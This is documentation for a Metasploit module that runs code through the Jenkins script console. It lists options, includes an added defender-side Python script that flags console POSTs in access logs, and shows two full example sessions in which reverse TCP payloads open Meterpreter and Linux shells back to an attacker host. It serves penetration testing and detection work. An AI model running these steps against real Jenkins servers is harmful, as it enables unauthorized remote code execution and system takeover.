Vulnerable Application
Jenkins can be downloaded from jenkins.io where binaries are available for a variety of operating systems. Both LTS and weekly builds are available.
Default settings have the script console enabled and require a valid user account in order to access it. A known account can be used with this module by setting the USERNAME and PASSWORD (or API_TOKEN) options.
This exploit has been tested against the following Jenkins versions:
- 2.411
- 2.410
- 2.409
- 2.401.1
- 2.346.3
- 2.103
- 1.565
Verification Steps
- Install the application
- Start msfconsole
- Do: use exploit/multi/http/jenkins_script_console
- Do: set RHOST [target host]
- Do: set TARGET [target id]
- Do: exploit
- You should get a shell.
Options
TARGETURI
The path to the target instance of Jenkins.
USERNAME
A username to an account that has access to the script console. This is only necessary if the Jenkins instance has been configured to require authentication.
PASSWORD
A password to an account that has access to the script console. This is only necessary if the Jenkins instance has been configured to require authentication and you aren't using an API_TOKEN (see below).
API_TOKEN
An API token to an account that has access to the script console. This is only necessary if the Jenkins instance has been configured to require authentication and you aren't using a PASSWORD (see above).
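From the defender's side, the footprint of this module is a logged-in user (or a token-authenticated one) fetching a CSRF crumb and then POSTing to the script console. The following is an added example, not part of this module documentation or of the Metasploit project: a small triage script that scans Jenkins access-log lines and reports script-console requests. It assumes the log is in NCSA combined format (what Jenkins's built-in access logger writes when it is enabled), and it relies on the standard Jenkins URLs /script, /scriptText and /crumbIssuer/api/json, none of which are named on this page. The log lines are constructed for the example.

```python
"""Flag Jenkins script-console usage in access-log lines (defender-side triage)."""
import re
from dataclasses import dataclass
from typing import Dict, List

# Constructed sample lines in NCSA combined format. They are invented for this
# example and are not traffic from the original page. The third field is the
# authenticated user; "-" means the request carried no valid credentials.
SAMPLE_LOG = """\
10.0.2.4 - - [19/Jun/2017:16:55:40 -0500] "GET /login HTTP/1.1" 200 4412 "-" "Mozilla/5.0"
10.0.2.4 - admin [19/Jun/2017:16:55:41 -0500] "GET /crumbIssuer/api/json HTTP/1.1" 200 112 "-" "Mozilla/5.0"
10.0.2.4 - admin [19/Jun/2017:16:55:42 -0500] "POST /script HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
10.0.2.4 - steiner [19/Jun/2017:16:55:43 -0500] "POST /scriptText HTTP/1.1" 200 17 "-" "curl/7.52.1"
203.0.113.9 - - [19/Jun/2017:16:55:50 -0500] "POST /script HTTP/1.1" 403 0 "-" "Mozilla/5.0"
10.0.2.4 - admin [19/Jun/2017:16:56:00 -0500] "GET /job/build/1/console HTTP/1.1" 200 3000 "-" "Mozilla/5.0"
"""

# One NCSA combined line: client IP, ident, authenticated user, timestamp,
# request line, status, response size. Referrer and user agent are ignored.
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

# The interactive console (/script) and its plain-text variant (/scriptText).
# The optional prefix covers a Jenkins served under a context path such as
# /jenkins (the TARGETURI option above) and the per-agent console under
# /computer/<node>/script.
SCRIPT_CONSOLE_RE = re.compile(r'^(?:/[^/?]+)*/script(?:Text)?(?:\?.*)?$')


@dataclass
class ConsoleHit:
    ip: str
    user: str
    method: str
    path: str
    status: int

    @property
    def anonymous(self) -> bool:
        return self.user == "-"

    @property
    def executed(self) -> bool:
        # A 2xx on a POST means Jenkins accepted and ran the Groovy body.
        # A GET only renders the form; 401/403 means authorization blocked it.
        return self.method == "POST" and 200 <= self.status < 300


def find_script_console_requests(log_text: str) -> List[ConsoleHit]:
    """Return every request to a script-console URL, in log order."""
    hits: List[ConsoleHit] = []
    for raw in log_text.splitlines():
        m = LINE_RE.match(raw)
        if not m:
            continue  # malformed or non-NCSA line: skip rather than crash
        if not SCRIPT_CONSOLE_RE.match(m["path"]):
            continue
        hits.append(ConsoleHit(m["ip"], m["user"], m["method"], m["path"], int(m["status"])))
    return hits


def summarize(hits: List[ConsoleHit]) -> Dict[str, object]:
    """Per-user count of successful executions plus the number of anonymous attempts."""
    executed: Dict[str, int] = {}
    anonymous_attempts = 0
    for h in hits:
        if h.anonymous:
            anonymous_attempts += 1
        if h.executed:
            executed[h.user] = executed.get(h.user, 0) + 1
    return {"executed_by_user": executed, "anonymous_attempts": anonymous_attempts}


if __name__ == "__main__":
    found = find_script_console_requests(SAMPLE_LOG)
    for hit in found:
        print(hit)
    print(summarize(found))
```

A successful run of this module shows up as a POST to /script with a 2xx status and a real user name in the third field, typically preceded by a GET to /crumbIssuer/api/json from the same client. Every such execution should map to a known administrator and a change you expected; anonymous 403s are noise unless they repeat from the same source. Jenkins only writes this log when the access logger is enabled, so confirm it is on before relying on the check.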
Scenarios
Example usage against a Windows 7 SP1 x64 target running Jenkins 2.19.1.
msf > use exploit/multi/http/jenkins_script_console
msf exploit(jenkins_script_console) > set TARGETURI /
TARGETURI => /
msf exploit(jenkins_script_console) > set USERNAME steiner
USERNAME => steiner
msf exploit(jenkins_script_console) > set PASSWORD I<3msf!
PASSWORD => I<3msf!
msf exploit(jenkins_script_console) > set RHOST 192.168.254.126
RHOST => 192.168.254.126
msf exploit(jenkins_script_console) > set RPORT 8080
RPORT => 8080
msf exploit(jenkins_script_console) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(jenkins_script_console) > set LHOST 192.168.254.132
LHOST => 192.168.254.132
msf exploit(jenkins_script_console) > exploit
[*] [2016.10.29-18:43:07] Started reverse TCP handler on 192.168.254.132:4444
[*] [2016.10.29-18:43:07] Checking access to the script console
[*] [2016.10.29-18:43:07] Logging in...
[*] [2016.10.29-18:43:07] Using CSRF token: '9623d245b9d60b5ceda72e2d3613431c' (Jenkins-Crumb style)
[*] [2016.10.29-18:43:07] 192.168.254.126:8080 - Sending command stager...
[*] [2016.10.29-18:43:08] Command Stager progress - 2.06% done (2048/99626 bytes)
[*] [2016.10.29-18:43:08] Command Stager progress - 4.11% done (4096/99626 bytes)
[*] [2016.10.29-18:43:08] Command Stager progress - 6.17% done (6144/99626 bytes)
[*] [2016.10.29-18:43:09] Command Stager progress - 8.22% done (8192/99626 bytes)
[*] [2016.10.29-18:43:09] Command Stager progress - 10.28% done (10240/99626 bytes)
[*] [2016.10.29-18:43:09] Command Stager progress - 12.33% done (12288/99626 bytes)
[*] [2016.10.29-18:43:10] Command Stager progress - 14.39% done (14336/99626 bytes)
[*] [2016.10.29-18:43:10] Command Stager progress - 16.45% done (16384/99626 bytes)
[*] [2016.10.29-18:43:10] Command Stager progress - 18.50% done (18432/99626 bytes)
[*] [2016.10.29-18:43:11] Command Stager progress - 20.56% done (20480/99626 bytes)
[*] [2016.10.29-18:43:11] Command Stager progress - 22.61% done (22528/99626 bytes)
[*] [2016.10.29-18:43:11] Command Stager progress - 24.67% done (24576/99626 bytes)
[*] [2016.10.29-18:43:12] Command Stager progress - 26.72% done (26624/99626 bytes)
[*] [2016.10.29-18:43:12] Command Stager progress - 28.78% done (28672/99626 bytes)
[*] [2016.10.29-18:43:12] Command Stager progress - 30.84% done (30720/99626 bytes)
[*] [2016.10.29-18:43:13] Command Stager progress - 32.89% done (32768/99626 bytes)
[*] [2016.10.29-18:43:13] Command Stager progress - 34.95% done (34816/99626 bytes)
[*] [2016.10.29-18:43:13] Command Stager progress - 37.00% done (36864/99626 bytes)
[*] [2016.10.29-18:43:14] Command Stager progress - 39.06% done (38912/99626 bytes)
[*] [2016.10.29-18:43:14] Command Stager progress - 41.11% done (40960/99626 bytes)
[*] [2016.10.29-18:43:14] Command Stager progress - 43.17% done (43008/99626 bytes)
[*] [2016.10.29-18:43:15] Command Stager progress - 45.23% done (45056/99626 bytes)
[*] [2016.10.29-18:43:15] Command Stager progress - 47.28% done (47104/99626 bytes)
[*] [2016.10.29-18:43:15] Command Stager progress - 49.34% done (49152/99626 bytes)
[*] [2016.10.29-18:43:16] Command Stager progress - 51.39% done (51200/99626 bytes)
[*] [2016.10.29-18:43:16] Command Stager progress - 53.45% done (53248/99626 bytes)
[*] [2016.10.29-18:43:17] Command Stager progress - 55.50% done (55296/99626 bytes)
[*] [2016.10.29-18:43:17] Command Stager progress - 57.56% done (57344/99626 bytes)
[*] [2016.10.29-18:43:17] Command Stager progress - 59.61% done (59392/99626 bytes)
[*] [2016.10.29-18:43:18] Command Stager progress - 61.67% done (61440/99626 bytes)
[*] [2016.10.29-18:43:18] Command Stager progress - 63.73% done (63488/99626 bytes)
[*] [2016.10.29-18:43:18] Command Stager progress - 65.78% done (65536/99626 bytes)
[*] [2016.10.29-18:43:19] Command Stager progress - 67.84% done (67584/99626 bytes)
[*] [2016.10.29-18:43:19] Command Stager progress - 69.89% done (69632/99626 bytes)
[*] [2016.10.29-18:43:19] Command Stager progress - 71.95% done (71680/99626 bytes)
[*] [2016.10.29-18:43:20] Command Stager progress - 74.00% done (73728/99626 bytes)
[*] [2016.10.29-18:43:20] Command Stager progress - 76.06% done (75776/99626 bytes)
[*] [2016.10.29-18:43:20] Command Stager progress - 78.12% done (77824/99626 bytes)
[*] [2016.10.29-18:43:21] Command Stager progress - 80.17% done (79872/99626 bytes)
[*] [2016.10.29-18:43:21] Command Stager progress - 82.23% done (81920/99626 bytes)
[*] [2016.10.29-18:43:21] Command Stager progress - 84.28% done (83968/99626 bytes)
[*] [2016.10.29-18:43:22] Command Stager progress - 86.34% done (86016/99626 bytes)
[*] [2016.10.29-18:43:22] Command Stager progress - 88.39% done (88064/99626 bytes)
[*] [2016.10.29-18:43:22] Command Stager progress - 90.45% done (90112/99626 bytes)
[*] [2016.10.29-18:43:23] Command Stager progress - 92.51% done (92160/99626 bytes)
[*] [2016.10.29-18:43:23] Command Stager progress - 94.56% done (94208/99626 bytes)
[*] [2016.10.29-18:43:23] Command Stager progress - 96.62% done (96256/99626 bytes)
[*] [2016.10.29-18:43:24] Command Stager progress - 98.67% done (98304/99626 bytes)
[*] [2016.10.29-18:43:24] Sending stage (957999 bytes) to 192.168.254.126
[*] [2016.10.29-18:43:24] Command Stager progress - 100.00% done (99626/99626 bytes)
[*] Meterpreter session 1 opened (192.168.254.132:4444 -> 192.168.254.126:49258) at 2016-10-29 18:43:26 -0400
meterpreter > sysinfo
Computer : PWNME-PC
OS : Windows 7 (Build 7601, Service Pack 1).
Architecture : x64 (Current Process is WOW64)
System Language : en_US
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x86/win32
meterpreter >
Example usage against an x64 Linux target running Jenkins 2.46.3.
msf > use exploit/multi/http/jenkins_script_console
msf exploit(jenkins_script_console) > set RHOST 172.17.0.1
RHOST => 172.17.0.1
msf exploit(jenkins_script_console) > set RPORT 8080
RPORT => 8080
msf exploit(jenkins_script_console) > set TARGETURI /
TARGETURI => /
msf exploit(jenkins_script_console) > set USERNAME admin
USERNAME => admin
msf exploit(jenkins_script_console) > set API_TOKEN 24e0b80d009ed12590ff85866d88c00d
API_TOKEN => 24e0b80d009ed12590ff85866d88c00d
msf exploit(jenkins_script_console) > set TARGET 1
TARGET => 1
msf exploit(jenkins_script_console) > set PAYLOAD linux/x86/shell/reverse_tcp
PAYLOAD => linux/x86/shell/reverse_tcp
msf exploit(jenkins_script_console) > set LHOST 10.0.2.4
LHOST => 10.0.2.4
msf exploit(jenkins_script_console) > exploit
[*] Started reverse TCP handler on 10.0.2.4:4444
[*] Checking access to the script console
[*] Authenticating with token...
[*] Using CSRF token: 'd41639a6f5721760a8ee3df5d6a71eec' (Jenkins-Crumb style)
[*] 172.17.0.1:8080 - Sending Linux stager...
[*] Sending stage (36 bytes) to 172.17.0.2
[*] Command shell session 1 opened (10.0.2.4:4444 -> 172.17.0.2:53962) at 2017-06-19 16:55:42 -0500
[!] Deleting /tmp/AsqL5Pg payload file
whoami
jenkins
id
uid=1000(jenkins) gid=1000(jenkins) groups=1000(jenkins)
uname -a
Linux b4b4e715101e 4.4.0-79-generic #100-Ubuntu SMP Wed May 17 19:58:14 UTC 2017 x86_64 GNU/Linux